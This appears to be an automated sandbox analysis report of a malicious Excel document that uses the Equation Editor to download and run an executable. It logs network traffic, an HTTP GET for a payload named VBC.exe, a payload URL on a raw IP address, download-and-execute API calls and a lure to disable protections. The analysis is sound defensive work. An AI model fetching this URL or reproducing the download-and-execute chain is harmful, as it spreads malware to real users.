    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 29 Nov 2022 07:13:05 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.33Last-Modified: Tue, 29 Nov 2022 05:24:03 GMTETag: "74a68-5ee95323a363c"Accept-Ranges: bytesContent-Length: 477800Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 e8 81 e9 50 86 d2 e9 50 86 d2 e9 50 86 d2 2a 5f d9 d2 eb 50 86 d2 e9 50 87 d2 4f 50 86 d2 2a 5f db d2 e6 50 86 d2 bd 73 b6 d2 e3 50 86 d2 2e 56 80 d2 e8 50 86 d2 52 69 63 68 e9 50 86 d2 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 38 ca 4d 58 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 62 00 00 00 2a 02 00 00 08 00 00 4a 34 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 70 09 00 00 04 00 00 17 86 07 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 85 00 00 a0 00 00 00 00 e0 06 00 68 88 02 00 00 00 00 00 00 00 00 00 10 35 07 00 58 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f1 61 00 00 00 10 00 00 00 62 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a4 13 00 00 00 80 00 00 00 14 00 00 00 66 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 03 02 00 00 a0 00 00 00 06 00 00 00 7a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 30 04 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 68 88 02 00 00 e0 06 00 00 8a 02 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
    Source: global trafficHTTP traffic detected: GET /5643/VBC.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.245.34.91Connection: Keep-Alive
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035406CF URLDownloadToFileW,ShellExecuteW,ExitProcess,
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: EQNEDT32.EXE, 00000002.00000002.973436340.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.comS equals www.linkedin.com (Linkedin)
    Source: EQNEDT32.EXE, 00000002.00000002.973436340.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
    Source: EQNEDT32.EXE, 00000002.00000002.973393132.000000000065F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.34.91/5643/VBC.exe
    Source: EQNEDT32.EXE, 00000002.00000002.973393132.000000000065F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.34.91/5643/VBC.exehhC:
    Source: EQNEDT32.EXE, 00000002.00000002.973646300.0000000003540000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.245.34.91/5643/VBC.exej
    Source: EQNEDT32.EXE, 00000002.00000002.973393132.000000000065F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.34.91/5643/VBC.exel
    Source: vbc.exe, 00000005.00000000.972752433.000000000040A000.00000008.00000001.01000000.00000004.sdmp, vbc.exe, 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmp, vbc.exe.2.dr, VBC[1].exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: EQNEDT32.EXE, 00000002.00000002.973393132.000000000065F000.00000004.00000020.00020000.00000000.sdmp, vbc.exe.2.dr, VBC[1].exe.2.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
    Source: vbc.exe.2.dr, VBC[1].exe.2.drString found in binary or memory: http://s.symcd.com06
    Source: vbc.exe.2.dr, VBC[1].exe.2.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
    Source: EQNEDT32.EXE, 00000002.00000002.973393132.000000000065F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-ts
    Source: vbc.exe.2.dr, VBC[1].exe.2.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
    Source: EQNEDT32.EXE, 00000002.00000002.973393132.000000000065F000.00000004.00000020.00020000.00000000.sdmp, vbc.exe.2.dr, VBC[1].exe.2.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
    Source: EQNEDT32.EXE, 00000002.00000002.973393132.000000000065F000.00000004.00000020.00020000.00000000.sdmp, vbc.exe.2.dr, VBC[1].exe.2.drString found in binary or memory: https://d.symcb.com/cps0%
    Source: EQNEDT32.EXE, 00000002.00000002.973393132.000000000065F000.00000004.00000020.00020000.00000000.sdmp, vbc.exe.2.dr, VBC[1].exe.2.drString found in binary or memory: https://d.symcb.com/rpa0
    Source: EQNEDT32.EXE, 00000002.00000002.973393132.000000000065F000.00000004.00000020.00020000.00000000.sdmp, vbc.exe.2.dr, VBC[1].exe.2.drString found in binary or memory: https://d.symcb.com/rpa0.
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4A546E2A.emfJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035406CF URLDownloadToFileW,ShellExecuteW,ExitProcess,
    Source: global trafficHTTP traffic detected: GET /5643/VBC.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.245.34.91Connection: Keep-Alive
    Source: C:\Users\Public\vbc.exeCode function: 5_2_004054B0 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

    System Summary

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
    Source: Screenshot number: 4Screenshot OCR: document is protected 18 19 20 21 22 23 Open the document in If thiS document was n :' h~
    Office equation editor drops PE file
